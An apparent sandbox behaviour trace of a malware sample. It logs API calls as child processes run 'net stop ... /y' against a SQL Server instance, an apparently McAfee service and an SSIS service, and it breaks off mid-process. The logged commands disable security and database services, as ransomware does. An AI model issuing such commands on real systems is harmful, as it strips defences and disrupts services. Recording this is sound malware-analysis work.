_wcsicmp (_String1="continue", _String2="stop") returned -16 [0214.859] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0214.859] _wcsicmp (_String1="file", _String2="stop") returned -13 [0214.859] _wcsicmp (_String1="files", _String2="stop") returned -13 [0214.859] _wcsicmp (_String1="group", _String2="stop") returned -12 [0214.859] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0214.859] _wcsicmp (_String1="help", _String2="stop") returned -11 [0214.859] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0214.859] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0214.859] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0214.859] _wcsicmp (_String1="session", _String2="stop") returned -15 [0214.859] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0214.859] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0214.859] _wcsicmp (_String1="share", _String2="stop") returned -12 [0214.859] _wcsicmp (_String1="start", _String2="stop") returned -14 [0214.859] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0214.859] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0214.859] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0214.859] _wcsicmp (_String1="accounts", _String2="MSSQL$TPS") returned -12 [0214.859] _wcsicmp (_String1="computer", _String2="MSSQL$TPS") returned -10 [0214.859] _wcsicmp (_String1="config", _String2="MSSQL$TPS") returned -10 [0214.859] _wcsicmp (_String1="continue", _String2="MSSQL$TPS") returned -10 [0214.859] _wcsicmp (_String1="cont", _String2="MSSQL$TPS") returned -10 [0214.859] _wcsicmp (_String1="file", _String2="MSSQL$TPS") returned -7 [0214.859] _wcsicmp (_String1="files", _String2="MSSQL$TPS") returned -7 [0214.859] _wcsicmp (_String1="group", _String2="MSSQL$TPS") returned -6 [0214.859] _wcsicmp (_String1="groups", _String2="MSSQL$TPS") returned -6 [0214.859] _wcsicmp (_String1="help", _String2="MSSQL$TPS") returned -5 [0214.859] _wcsicmp (_String1="helpmsg", _String2="MSSQL$TPS") returned -5 [0214.859] _wcsicmp (_String1="localgroup", _String2="MSSQL$TPS") returned -1 [0214.859] _wcsicmp (_String1="pause", _String2="MSSQL$TPS") returned 3 [0214.859] _wcsicmp (_String1="session", _String2="MSSQL$TPS") returned 6 [0214.859] _wcsicmp (_String1="sessions", _String2="MSSQL$TPS") returned 6 [0214.859] _wcsicmp (_String1="sess", _String2="MSSQL$TPS") returned 6 [0214.859] _wcsicmp (_String1="share", _String2="MSSQL$TPS") returned 6 [0214.859] _wcsicmp (_String1="start", _String2="MSSQL$TPS") returned 6 [0214.859] _wcsicmp (_String1="stats", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="statistics", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="stop", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="time", _String2="MSSQL$TPS") returned 7 [0214.860] _wcsicmp (_String1="user", _String2="MSSQL$TPS") returned 8 [0214.860] _wcsicmp (_String1="users", _String2="MSSQL$TPS") returned 8 [0214.860] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0214.860] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0214.860] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0214.860] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0214.860] _wcsicmp (_String1="netpopup", _String2="MSSQL$TPS") returned 1 [0214.860] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0214.860] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0214.860] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0214.860] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0214.860] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0214.860] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0214.860] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0214.860] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0214.860] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0214.860] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0214.860] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0214.860] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0214.860] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0214.860] _wcsupr (in: _String="MSSQL$TPS" | out: _String="MSSQL$TPS") returned="MSSQL$TPS" [0214.860] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7454b8 [0214.863] GetServiceKeyNameW (in: hSCManager=0x7454b8, lpDisplayName="MSSQL$TPS", lpServiceName=0x35aaf0, lpcchBuffer=0xdfc54 | out: lpServiceName="", lpcchBuffer=0xdfc54) returned 0 [0214.864] _wcsicmp (_String1="msg", _String2="MSSQL$TPS") returned -12 [0214.864] _wcsicmp (_String1="messenger", _String2="MSSQL$TPS") returned -14 [0214.864] _wcsicmp (_String1="receiver", _String2="MSSQL$TPS") returned 5 [0214.864] _wcsicmp (_String1="rcv", _String2="MSSQL$TPS") returned 5 [0214.864] _wcsicmp (_String1="redirector", _String2="MSSQL$TPS") returned 5 [0214.864] _wcsicmp (_String1="redir", _String2="MSSQL$TPS") returned 5 [0214.864] _wcsicmp (_String1="rdr", _String2="MSSQL$TPS") returned 5 [0214.864] _wcsicmp (_String1="workstation", _String2="MSSQL$TPS") returned 10 [0214.864] _wcsicmp (_String1="work", _String2="MSSQL$TPS") returned 10 [0214.864] _wcsicmp (_String1="wksta", _String2="MSSQL$TPS") returned 10 [0214.864] _wcsicmp (_String1="prdr", _String2="MSSQL$TPS") returned 3 [0214.864] _wcsicmp (_String1="devrdr", _String2="MSSQL$TPS") returned -9 [0214.864] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$TPS") returned -1 [0214.864] _wcsicmp (_String1="server", _String2="MSSQL$TPS") returned 6 [0214.864] _wcsicmp (_String1="svr", _String2="MSSQL$TPS") returned 6 [0214.864] _wcsicmp (_String1="srv", _String2="MSSQL$TPS") returned 6 [0214.864] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$TPS") returned -1 [0214.864] _wcsicmp (_String1="alerter", _String2="MSSQL$TPS") returned -12 [0214.864] _wcsicmp (_String1="netlogon", _String2="MSSQL$TPS") returned 1 [0214.864] NetServiceControl (in: servername=0x0, service="MSSQL$TPS", opcode=0x0, arg=0x0, bufptr=0xdfc50 | out: bufptr=0xdfc50) returned 0x889 [0214.865] wcscpy_s (in: _Destination=0x35a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0214.865] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0214.866] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x35b338, nSize=0x800, Arguments=0x359dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0214.867] GetFileType (hFile=0x26c) returned 0x3 [0214.867] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x743fe8 [0214.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x743fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0214.867] WriteFile (in: hFile=0x26c, lpBuffer=0x743fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdfb90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfb90, lpOverlapped=0x0) returned 0 [0214.867] LocalFree (hMem=0x743fe8) returned 0x0 [0214.867] GetFileType (hFile=0x26c) returned 0x3 [0214.867] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746290 [0214.867] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0214.867] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfb90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfb90, lpOverlapped=0x0) returned 0 [0214.867] LocalFree (hMem=0x746290) returned 0x0 [0214.867] _ultow (in: _Dest=0x889, _Radix=916416 | out: _Dest=0x889) returned="2185" [0214.867] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x35b338, nSize=0x800, Arguments=0x359dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0214.867] GetFileType (hFile=0x26c) returned 0x3 [0214.867] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x746290 [0214.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x746290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0214.868] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdfb9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfb9c, lpOverlapped=0x0) returned 0 [0214.868] LocalFree (hMem=0x746290) returned 0x0 [0214.868] GetFileType (hFile=0x26c) returned 0x3 [0214.868] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x746290 [0214.868] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x746290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nt", lpUsedDefaultChar=0x0) returned 2 [0214.868] WriteFile (in: hFile=0x26c, lpBuffer=0x746290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdfb9c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xdfb9c, lpOverlapped=0x0) returned 0 [0214.868] LocalFree (hMem=0x746290) returned 0x0 [0214.868] NetApiBufferFree (Buffer=0x741c60) returned 0x0 [0214.868] NetApiBufferFree (Buffer=0x741c78) returned 0x0 [0214.868] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$TPS /y" [0214.869] exit (_Code=2) Process: id = "336" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x51e0c000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop mfemms /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 509 os_tid = 0xb94 Process: id = "337" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x60c8e000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "336" os_parent_pid = "0xba8" cmd_line = "C:\\Windows\\system32\\net1 stop mfemms /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 510 os_tid = 0x2b4 [0215.002] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fc34 | out: lpSystemTimeAsFileTime=0x10fc34*(dwLowDateTime=0x49587060, dwHighDateTime=0x1d57a87)) [0215.002] GetCurrentProcessId () returned 0xbc0 [0215.002] GetCurrentThreadId () returned 0x2b4 [0215.002] GetTickCount () returned 0x116f4fa [0215.002] QueryPerformanceCounter (in: lpPerformanceCount=0x10fc2c | out: lpPerformanceCount=0x10fc2c*=33528689650) returned 1 [0215.002] GetModuleHandleA (lpModuleName=0x0) returned 0x7a0000 [0215.003] __set_app_type (_Type=0x1) [0215.003] __p__fmode () returned 0x74eb31f4 [0215.003] __p__commode () returned 0x74eb31fc [0215.003] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7affe6) returned 0x0 [0215.003] __getmainargs (in: _Argc=0x7b9064, _Argv=0x7b906c, _Env=0x7b9068, _DoWildCard=0, _StartInfo=0x7b9024 | out: _Argc=0x7b9064, _Argv=0x7b906c, _Env=0x7b9068) returned 0 [0215.003] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.004] GetConsoleOutputCP () returned 0x1b5 [0215.004] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7b9080 | out: lpCPInfo=0x7b9080) returned 1 [0215.004] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.007] sprintf_s (in: _DstBuf=0x10fbec, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0215.007] setlocale (category=0, locale=".437") returned="English_United States.437" [0215.009] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0215.009] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0215.009] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfemms /y" [0215.009] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f9b8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0215.009] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5a3c00 [0215.009] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0215.009] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fbbc | out: Buffer=0x10fbbc*=0x5a1c60) returned 0x0 [0215.009] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x10fbbc | out: Buffer=0x10fbbc*=0x5a1c78) returned 0x0 [0215.009] _fileno (_File=0x74eb2900) returned -2 [0215.010] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0215.010] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0215.010] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0215.010] _wcsicmp (_String1="config", _String2="stop") returned -16 [0215.010] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0215.010] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0215.010] _wcsicmp (_String1="file", _String2="stop") returned -13 [0215.010] _wcsicmp (_String1="files", _String2="stop") returned -13 [0215.010] _wcsicmp (_String1="group", _String2="stop") returned -12 [0215.010] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0215.010] _wcsicmp (_String1="help", _String2="stop") returned -11 [0215.010] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0215.010] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0215.010] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0215.010] _wcsicmp (_String1="session", _String2="stop") returned -15 [0215.010] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0215.010] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0215.010] _wcsicmp (_String1="share", _String2="stop") returned -12 [0215.010] _wcsicmp (_String1="start", _String2="stop") returned -14 [0215.010] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0215.010] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0215.010] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0215.010] _wcsicmp (_String1="accounts", _String2="mfemms") returned -12 [0215.010] _wcsicmp (_String1="computer", _String2="mfemms") returned -10 [0215.010] _wcsicmp (_String1="config", _String2="mfemms") returned -10 [0215.010] _wcsicmp (_String1="continue", _String2="mfemms") returned -10 [0215.010] _wcsicmp (_String1="cont", _String2="mfemms") returned -10 [0215.010] _wcsicmp (_String1="file", _String2="mfemms") returned -7 [0215.010] _wcsicmp (_String1="files", _String2="mfemms") returned -7 [0215.010] _wcsicmp (_String1="group", _String2="mfemms") returned -6 [0215.010] _wcsicmp (_String1="groups", _String2="mfemms") returned -6 [0215.010] _wcsicmp (_String1="help", _String2="mfemms") returned -5 [0215.010] _wcsicmp (_String1="helpmsg", _String2="mfemms") returned -5 [0215.010] _wcsicmp (_String1="localgroup", _String2="mfemms") returned -1 [0215.011] _wcsicmp (_String1="pause", _String2="mfemms") returned 3 [0215.011] _wcsicmp (_String1="session", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="sessions", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="sess", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="share", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="start", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="stats", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="statistics", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="stop", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="time", _String2="mfemms") returned 7 [0215.011] _wcsicmp (_String1="user", _String2="mfemms") returned 8 [0215.011] _wcsicmp (_String1="users", _String2="mfemms") returned 8 [0215.011] _wcsicmp (_String1="msg", _String2="mfemms") returned 13 [0215.011] _wcsicmp (_String1="messenger", _String2="mfemms") returned -1 [0215.011] _wcsicmp (_String1="receiver", _String2="mfemms") returned 5 [0215.011] _wcsicmp (_String1="rcv", _String2="mfemms") returned 5 [0215.011] _wcsicmp (_String1="netpopup", _String2="mfemms") returned 1 [0215.011] _wcsicmp (_String1="redirector", _String2="mfemms") returned 5 [0215.011] _wcsicmp (_String1="redir", _String2="mfemms") returned 5 [0215.011] _wcsicmp (_String1="rdr", _String2="mfemms") returned 5 [0215.011] _wcsicmp (_String1="workstation", _String2="mfemms") returned 10 [0215.011] _wcsicmp (_String1="work", _String2="mfemms") returned 10 [0215.011] _wcsicmp (_String1="wksta", _String2="mfemms") returned 10 [0215.011] _wcsicmp (_String1="prdr", _String2="mfemms") returned 3 [0215.011] _wcsicmp (_String1="devrdr", _String2="mfemms") returned -9 [0215.011] _wcsicmp (_String1="lanmanworkstation", _String2="mfemms") returned -1 [0215.011] _wcsicmp (_String1="server", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="svr", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="srv", _String2="mfemms") returned 6 [0215.011] _wcsicmp (_String1="lanmanserver", _String2="mfemms") returned -1 [0215.011] _wcsicmp (_String1="alerter", _String2="mfemms") returned -12 [0215.011] _wcsicmp (_String1="netlogon", _String2="mfemms") returned 1 [0215.011] _wcsupr (in: _String="mfemms" | out: _String="MFEMMS") returned="MFEMMS" [0215.012] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5a54b0 [0215.014] GetServiceKeyNameW (in: hSCManager=0x5a54b0, lpDisplayName="MFEMMS", lpServiceName=0x7baaf0, lpcchBuffer=0x10fb58 | out: lpServiceName="", lpcchBuffer=0x10fb58) returned 0 [0215.015] _wcsicmp (_String1="msg", _String2="MFEMMS") returned 13 [0215.015] _wcsicmp (_String1="messenger", _String2="MFEMMS") returned -1 [0215.015] _wcsicmp (_String1="receiver", _String2="MFEMMS") returned 5 [0215.015] _wcsicmp (_String1="rcv", _String2="MFEMMS") returned 5 [0215.015] _wcsicmp (_String1="redirector", _String2="MFEMMS") returned 5 [0215.015] _wcsicmp (_String1="redir", _String2="MFEMMS") returned 5 [0215.015] _wcsicmp (_String1="rdr", _String2="MFEMMS") returned 5 [0215.015] _wcsicmp (_String1="workstation", _String2="MFEMMS") returned 10 [0215.015] _wcsicmp (_String1="work", _String2="MFEMMS") returned 10 [0215.015] _wcsicmp (_String1="wksta", _String2="MFEMMS") returned 10 [0215.015] _wcsicmp (_String1="prdr", _String2="MFEMMS") returned 3 [0215.015] _wcsicmp (_String1="devrdr", _String2="MFEMMS") returned -9 [0215.015] _wcsicmp (_String1="lanmanworkstation", _String2="MFEMMS") returned -1 [0215.015] _wcsicmp (_String1="server", _String2="MFEMMS") returned 6 [0215.015] _wcsicmp (_String1="svr", _String2="MFEMMS") returned 6 [0215.015] _wcsicmp (_String1="srv", _String2="MFEMMS") returned 6 [0215.015] _wcsicmp (_String1="lanmanserver", _String2="MFEMMS") returned -1 [0215.015] _wcsicmp (_String1="alerter", _String2="MFEMMS") returned -12 [0215.015] _wcsicmp (_String1="netlogon", _String2="MFEMMS") returned 1 [0215.015] NetServiceControl (in: servername=0x0, service="MFEMMS", opcode=0x0, arg=0x0, bufptr=0x10fb54 | out: bufptr=0x10fb54) returned 0x889 [0215.016] wcscpy_s (in: _Destination=0x7ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0215.016] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0215.018] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x7bb338, nSize=0x800, Arguments=0x7b9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0215.020] GetFileType (hFile=0x26c) returned 0x3 [0215.020] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x5a3fe0 [0215.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x5a3fe0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0215.020] WriteFile (in: hFile=0x26c, lpBuffer=0x5a3fe0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10fa94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fa94, lpOverlapped=0x0) returned 0 [0215.020] LocalFree (hMem=0x5a3fe0) returned 0x0 [0215.020] GetFileType (hFile=0x26c) returned 0x3 [0215.020] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a6288 [0215.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a6288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0215.020] WriteFile (in: hFile=0x26c, lpBuffer=0x5a6288, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10fa94, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fa94, lpOverlapped=0x0) returned 0 [0215.020] LocalFree (hMem=0x5a6288) returned 0x0 [0215.020] _ultow (in: _Dest=0x889, _Radix=1112772 | out: _Dest=0x889) returned="2185" [0215.020] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x7bb338, nSize=0x800, Arguments=0x7b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0215.020] GetFileType (hFile=0x26c) returned 0x3 [0215.020] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5a6288 [0215.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5a6288, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0215.020] WriteFile (in: hFile=0x26c, lpBuffer=0x5a6288, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10faa0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10faa0, lpOverlapped=0x0) returned 0 [0215.020] LocalFree (hMem=0x5a6288) returned 0x0 [0215.020] GetFileType (hFile=0x26c) returned 0x3 [0215.020] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5a6288 [0215.020] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5a6288, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nZ", lpUsedDefaultChar=0x0) returned 2 [0215.020] WriteFile (in: hFile=0x26c, lpBuffer=0x5a6288, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10faa0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10faa0, lpOverlapped=0x0) returned 0 [0215.020] LocalFree (hMem=0x5a6288) returned 0x0 [0215.021] NetApiBufferFree (Buffer=0x5a1c60) returned 0x0 [0215.021] NetApiBufferFree (Buffer=0x5a1c78) returned 0x0 [0215.021] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop mfemms /y" [0215.021] exit (_Code=2) Process: id = "338" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x52911000" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 511 os_tid = 0x980 Process: id = "339" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x53e0d000" os_pid = "0x5b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "338" os_parent_pid = "0x40c" cmd_line = "C:\\Windows\\system32\\net1 stop MsDtsServer100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 512 os_tid = 0x7f4 [0215.162] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x38fd68 | out: lpSystemTimeAsFileTime=0x38fd68*(dwLowDateTime=0x49703e20, dwHighDateTime=0x1d57a87)) [0215.162] GetCurrentProcessId () returned 0x5b4 [0215.162] GetCurrentThreadId () returned 0x7f4 [0215.162] GetTickCount () returned 0x116f596 [0215.162] QueryPerformanceCounter (in: lpPerformanceCount=0x38fd60 | out: lpPerformanceCount=0x38fd60*=33544705590) returned 1 [0215.163] GetModuleHandleA (lpModuleName=0x0) returned 0x170000 [0215.163] __set_app_type (_Type=0x1) [0215.163] __p__fmode () returned 0x74eb31f4 [0215.163] __p__commode () returned 0x74eb31fc [0215.163] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x17ffe6) returned 0x0 [0215.163] __getmainargs (in: _Argc=0x189064, _Argv=0x18906c, _Env=0x189068, _DoWildCard=0, _StartInfo=0x189024 | out: _Argc=0x189064, _Argv=0x18906c, _Env=0x189068) returned 0 [0215.163] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.163] GetConsoleOutputCP () returned 0x1b5 [0215.163] 